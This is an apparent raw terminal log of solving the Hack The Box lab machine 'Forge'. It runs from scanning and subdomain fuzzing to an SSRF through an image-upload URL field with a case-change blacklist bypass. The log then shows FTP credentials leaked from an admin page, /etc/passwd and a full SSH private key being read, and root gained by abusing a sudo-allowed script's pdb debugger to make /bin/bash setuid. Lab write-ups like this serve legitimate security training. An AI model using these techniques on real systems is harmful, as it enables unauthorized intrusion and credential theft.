sudo nmap -sC -sS -sV 10.10.11.111
[sudo] password for jd: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 21:02 CST
Nmap scan report for 10.10.11.111 (10.10.11.111)
Host is up (0.073s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open     http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://forge.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.93 seconds

dirbuster -l /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://forge.htb/

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /icons/ - 403
File found: /upload - 200
Dir found: /static/ - 200
Dir found: /static/images/ - 200
Dir found: /static/js/ - 200
File found: /static/js/main.js - 200
Dir found: /static/css/ - 200
File found: /static/css/main.css - 200
File found: /static/css/upload.css - 200



http://forge.htb/upload

curl 'http://forge.htb/upload' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: es-MX,es;q=0.5' --compressed -H 'Content-Type: multipart/form-data; boundary=---------------------------20624204328342128883911619409' -H 'Origin: http://forge.htb' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://forge.htb/upload' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1' --data-binary $'-----------------------------20624204328342128883911619409\r\nContent-Disposition: form-data; name="file"; filename="dig1.png"\r\nContent-Type: image/png\r\n\r\n-----------------------------20624204328342128883911619409\r\nContent-Disposition: form-data; name="local"\r\n\r\n1\r\n-----------------------------20624204328342128883911619409--\r\n'

http://forge.htb/static/js/main.js
function show_upload_local_file(argument) {
    var form_div = document.getElementById('form-div');
    form_div.innerHTML = `
        <form action="/upload" method="POST" enctype="multipart/form-data">
            <input type="file" name="file" class="file">
            <input name="local" type="hidden" value='1'>
            <br>
            <br>
            <button id="submit-local" type="submit" class="submit">Submit</button>
        </form>
        `;
}

function show_upload_remote_file(argument) {
    var form_div = document.getElementById('form-div');
    form_div.innerHTML = `
    <br><br>
        <form action="/upload" method="POST" enctype="application/x-www-form-urlencoded" >
            <input type="textbox" name="url" class="textbox">
            <input name="remote" type="hidden" value='1'>
            <br>
            <br>
            <button id="submit-remote" type="submit" class="submit">Submit</button>
        </form>
        `;
}

http://forge.htb/uploads/jDGJVtdHbEgXdGtbhBSw

ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://forge.htb -H "Host: FUZZ.forge.htb" -mc 200


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://forge.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.forge.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

admin                   [Status: 200, Size: 27, Words: 4, Lines: 2]
:: Progress: [19966/19966] :: Job [1/1] :: 420 req/sec :: Duration: [0:10:09] :: Errors: 0 :

curl --location --request GET 'http://admin.forge.htb/'
Only localhost is allowed!

dirbuster -l /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://admin.forge.htb/


Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: /icons/ - 403
Dir found: /static/ - 200
Dir found: /static/css/ - 200
Dir found: /static/js/ - 200
Dir found: /icons/small/ - 403
File found: /static/css/announcements.css - 200
File found: /static/css/main.css - 200
File found: /static/css/upload.css - 200
File found: /static/js/main.js - 200
^C                                      

 curl --location --request GET 'http://admin.forge.htb/'
Only localhost is allowed!

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u http://admin.forge.htb/FUZZ -fs 510

everything returns 200

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u http://forge.htb/FUZZ -fs 510


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://forge.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 510
________________________________________________

uploads                 [Status: 301, Size: 224, Words: 21, Lines: 4]
upload                  [Status: 200, Size: 929, Words: 267, Lines: 33]
static                  [Status: 301, Size: 307, Words: 20, Lines: 10]
.                       [Status: 200, Size: 2050, Words: 1069, Lines: 72]
server-status           [Status: 403, Size: 274, Words: 20, Lines: 10]
:: Progress: [43003/43003] :: Job [1/1] :: 402 req/sec :: Duration: [0:02:00] :: Errors: 0 :


Nothing fgs!

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=https%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2F7%2F77%2FGoogle_Images_2015_logo.svg%2F1200px-Google_Images_2015_logo.svg.png&remote=1'


            <strong>An error occured! Error : HTTPSConnectionPool(host=&#39;upload.wikimedia.org&#39;, port=443): Max retries exceeded with url: /wikipedia/commons/thumb/7/77/Google_Images_2015_logo.svg/1200px-Google_Images_2015_logo.svg.png (Caused by NewConnectionError(&#39;&lt;urllib3.connection.HTTPSConnection object at 0x7f5b5ca29580&gt;: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution&#39;))</strong>

http://10.10.14.224:7899/hashed.txt

python3 -m http.server 7899
http://10.10.14.224:7899/hashed.txt
curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2F10.10.14.224%3A7899%2Fhashed.txt&remote=1'

http://forge.htb/uploads/G6yv5c7hyP7ZaYEoSQf0

curl --location --request GET 'http://forge.htb/uploads/G6yv5c7hyP7ZaYEoSQf0'

go back to admin.forge.htb

https://unix.stackexchange.com/questions/545629/unable-to-access-apache-webserver-from-local-home-network

curl -v http://admin.forge.htb/
*   Trying 10.10.11.111:80...
* Connected to admin.forge.htb (10.10.11.111) port 80 (#0)
> GET / HTTP/1.1
> Host: admin.forge.htb
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 06 Nov 2021 20:59:22 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 27
< Vary: Accept-Encoding
< Content-Type: text/html; charset=utf-8
< 
Only localhost is allowed!
* Connection #0 to host admin.forge.htb left intact

use upload through url to get admin :facepalm:


curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2Fadmin.forge.htb%2F&remote=1'

    <h1>
        <center>
            <strong>URL contains a blacklisted address!</strong>
        </center>
    </h1>

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2F127.0.0.1&remote=1'
    <h1>
        <center>
            <strong>URL contains a blacklisted address!</strong>
        </center>
    </h1>

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2Flocalhost&remote=1'
    <h1>
        <center>
            <strong>URL contains a blacklisted address!</strong>
        </center>
    </h1>

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FlocalhosT&remote=1'

http://forge.htb/uploads/KQmlS9g1dKTPtpBqJ1tZ

wget http://forge.htb/uploads/KQmlS9g1dKTPtpBqJ1tZ

this is the gallery :facepalm:

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FADMIN.FORGE.htb&remote=1'

http://forge.htb/uploads/ax8lHgrmabdsehntsqaw

wget http://forge.htb/uploads/ax8lHgrmabdsehntsqaw


   <header>
            <nav>
                <h1 class=""><a href="/">Portal home</a></h1>
                <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
                <h1 class="align-right"><a href="/upload">Upload image</a></h1>
            </nav>
    </header>
    <br><br><br><br>
    <br><br><br><br>
    <center><h1>Welcome Admins!</h1></center>

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FADMIN.FORGE.htb%2Fannouncements&remote=1'

http://forge.htb/uploads/RvKrkOjFcIKPvKcUThRV
wget http://forge.htb/uploads/RvKrkOjFcIKPvKcUThRV



    An internal ftp server has been setup with credentials as user:heightofsecurity123!
    The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.
    The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=<url>.

ftp forge.htb     
ftp: connect: Connection timed out

https://jkorpela.fi/ftpurl.html

ftp://user:password@host:port/path

ftp://user:heightofsecurity123!@FORGE.htb/

curl -v -P - --insecure "ftp://forge.htb/" --user "user:heightofsecurity123\!"

 curl -v -P - --insecure "ftp://forge.htb/" --user "user:heightofsecurity123\!"
*   Trying 10.10.11.111:21...
^C

http://forge.htb/upload?u=http://10.10.14.224:7899/hashed.txt # Nothing
http://forge.htb/upload?u=ftp://user:heightofsecurity123!@forge.htb/ # Nothing

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FADMIN.FORGE.htb%2Fupload%3Fu%3Dhttp%3A%2F%2F10.10.14.224%3A7899%2Fhashed.txt&remote=1'

        <center>
            <strong><a href="http://forge.htb/uploads/mpXIcESUU2VjggFlwAmL">http://forge.htb/uploads/mpXIcESUU2VjggFlwAmL</strong>


curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FADMIN.FORGE.htb%2Fupload%3Fu%3Dftp%3A%2F%2Fuser%3Aheightofsecurity123%21%40FORGE.htb&remote=1'

        <center>
            <strong><a href="http://forge.htb/uploads/9kRWscRo8qELsd4utPH8">http://forge.htb/uploads/9kRWscRo8qELsd4utPH8</strong>
        </center>


wget http://forge.htb/uploads/9kRWscRo8qELsd4utPH8

drwxr-xr-x 3 1000 1000 4096 Aug 04 19:23 snap -rw-r----- 1 0 1000 33 Nov 06 18:16 user.txt

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FADMIN.FORGE.htb%2Fupload%3Fu%3Dftp%3A%2F%2Fuser%3Aheightofsecurity123%21%40FORGE.htb%2Fuser.txt&remote=1'

wget http://forge.htb/uploads/Obm8EC6Xp3EW4j0i4FwG

808640957829eaf70759c8253368eaee

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FADMIN.FORGE.htb%2Fupload%3Fu%3Dftp%3A%2F%2Fuser%3Aheightofsecurity123%21%40FORGE.htb%2F%2Fetc%2Fpasswd&remote=1'

wget http://forge.htb/uploads/iQyritTpHfrDIAmQ3hph

root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:NoobHacker:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
ftp:x:113:118:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FADMIN.FORGE.htb%2Fupload%3Fu%3Dftp%3A%2F%2Fuser%3Aheightofsecurity123%21%40FORGE.htb%2F%2F&remote=1'

http://forge.htb/uploads/cVjyVxBPNqi98U32OMC0

curl http://forge.htb/uploads/cVjyVxBPNqi98U32OMC0                                                                                                                                                                   
lrwxrwxrwx    1 0        0               7 Feb 01  2021 bin -> usr/bin
drwxr-xr-x    4 0        0            4096 Sep 07 17:09 boot
drwxr-xr-x    2 0        0            4096 May 19 14:18 cdrom
drwxr-xr-x   19 0        0            4000 Nov 06 18:16 dev
drwxr-xr-x   99 0        0            4096 Sep 07 17:09 etc
drwxr-xr-x    3 0        0            4096 Aug 04 19:23 home
lrwxrwxrwx    1 0        0               7 Feb 01  2021 lib -> usr/lib
lrwxrwxrwx    1 0        0               9 Feb 01  2021 lib32 -> usr/lib32
lrwxrwxrwx    1 0        0               9 Feb 01  2021 lib64 -> usr/lib64
lrwxrwxrwx    1 0        0              10 Feb 01  2021 libx32 -> usr/libx32
drwx------    2 0        0           16384 May 19 14:18 lost+found
drwxr-xr-x    2 0        0            4096 Feb 01  2021 media
drwxr-xr-x    2 0        0            4096 Feb 01  2021 mnt
drwxr-xr-x    2 0        0            4096 May 31 12:09 opt
dr-xr-xr-x  258 0        0               0 Nov 06 18:16 proc
drwx------    6 0        0            4096 Aug 20 02:22 root
drwxr-xr-x   28 0        0             860 Nov 06 20:06 run
lrwxrwxrwx    1 0        0               8 Feb 01  2021 sbin -> usr/sbin
drwxr-xr-x    6 0        0            4096 Feb 01  2021 snap
drwxr-xr-x    3 0        0            4096 May 20 06:48 srv
dr-xr-xr-x   13 0        0               0 Nov 06 18:16 sys
drwxrwxrwt   13 0        0            4096 Nov 06 21:05 tmp
drwxr-xr-x   15 0        0            4096 Aug 04 19:23 usr
drwxr-xr-x   14 0        0            4096 May 20 05:16 var

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FADMIN.FORGE.htb%2Fupload%3Fu%3Dftp%3A%2F%2Fuser%3Aheightofsecurity123%21%40FORGE.htb%2F%2Froot&remote=1'

curl http://forge.htb/uploads/6CB3pIqfp2G04MerJl7V                                                                                                                                                                       
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FADMIN.FORGE.htb%2Fupload%3Fu%3Dftp%3A%2F%2Fuser%3Aheightofsecurity123%21%40FORGE.htb&remote=1'

 curl http://forge.htb/uploads/HLIoQ1RMgysIcs6q8GUc                                                                                                                                                             
drwxr-xr-x    3 1000     1000         4096 Aug 04 19:23 snap
-rw-r-----    1 0        1000           33 Nov 06 18:16 user.txt

curl 'http://forge.htb/upload' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'url=http%3A%2F%2FADMIN.FORGE.htb%2Fupload%3Fu%3Dftp%3A%2F%2Fuser%3Aheightofsecurity123%21%40FORGE.htb%2F.ssh%2Fid_rsa&remote=1'

 curl http://forge.htb/uploads/EKnG5LeqhUm0tK2axRcb                                                                                                                                                                             
-----BEGIN OPENSSH PRIVATE KEY-----
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
shlLupso7WoS0AAAAKdXNlckBmb3JnZQE=
-----END OPENSSH PRIVATE KEY-----

curl http://forge.htb/uploads/EKnG5LeqhUm0tK2axRcb >> forge_id_rsa
chmod 600 forge_id_rsa


ssh user@forge.htb -i forge_id_rsa

sudo -l
Matching Defaults entries for user on forge:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on forge:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py


#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = random.randint(1025, 65535)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'secretadminpassword':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
finally:
    quit()

https://www.codementor.io/@stevek/advanced-python-debugging-with-pdb-g56gvmpfa

/usr/bin/python3 /opt/remote-manage.py -mpdb /opt/remote-manage.py

 ps aux | grep remote
user        2354  0.0  0.5  17804 11628 pts/0    S+   21:57   0:00 /usr/bin/python3 /opt/remote-manage.py -mpdb /opt/remote-manage.py
user        2451  0.0  0.0   6432   664 pts/1    S+   21:58   0:00 grep remote

sudo /usr/bin/python3 /opt/remote-manage.py

 ps aux | grep remote
root        2453  0.0  0.2   9404  4792 pts/0    S+   21:58   0:00 sudo /usr/bin/python3 /opt/remote-manage.py
root        2454  0.2  0.5  17800 11604 pts/0    S+   21:58   0:00 /usr/bin/python3 /opt/remote-manage.py
user        2457  0.0  0.0   6432   676 pts/1    S+   21:59   0:00 grep remote


 nc 127.0.0.1 21647
Enter the secret passsword: secretadminpassword
Welcome admin!

What do you wanna do: 
[1] View processes
[2] View free memory
[3] View listening sockets
[4] Quit
54545

What do you wanna do: 
[1] View processes
[2] View free memory
[3] View listening sockets
[4] Quit
laalala


 /usr/bin/python3 /opt/remote-manage.py -mpdb /opt/remote-manage.py
Listening on localhost:28003
^C-bash-5.0$ sudo /usr/bin/python3 /opt/remote-manage.py
Listening on localhost:21647
invalid literal for int() with base 10: b'laalala'
> /opt/remote-manage.py(27)<module>()
-> option = int(clientsock.recv(1024).strip())
(Pdb) subprocess
<module 'subprocess' from '/usr/lib/python3.8/subprocess.py'>
(Pdb) subprocess.getoutput('chmod u+s /bin/bash')
''


subprocess.getoutput('chmod u+s /bin/bash')

-bash-5.0$ /bin/bash -p
bash-5.0# whoami
root

bash-5.0# cd /root
bash-5.0# ls
clean-uploads.sh  root.txt  snap
bash-5.0# cat root.txt 
38575694f92fffe17ace4b372963407a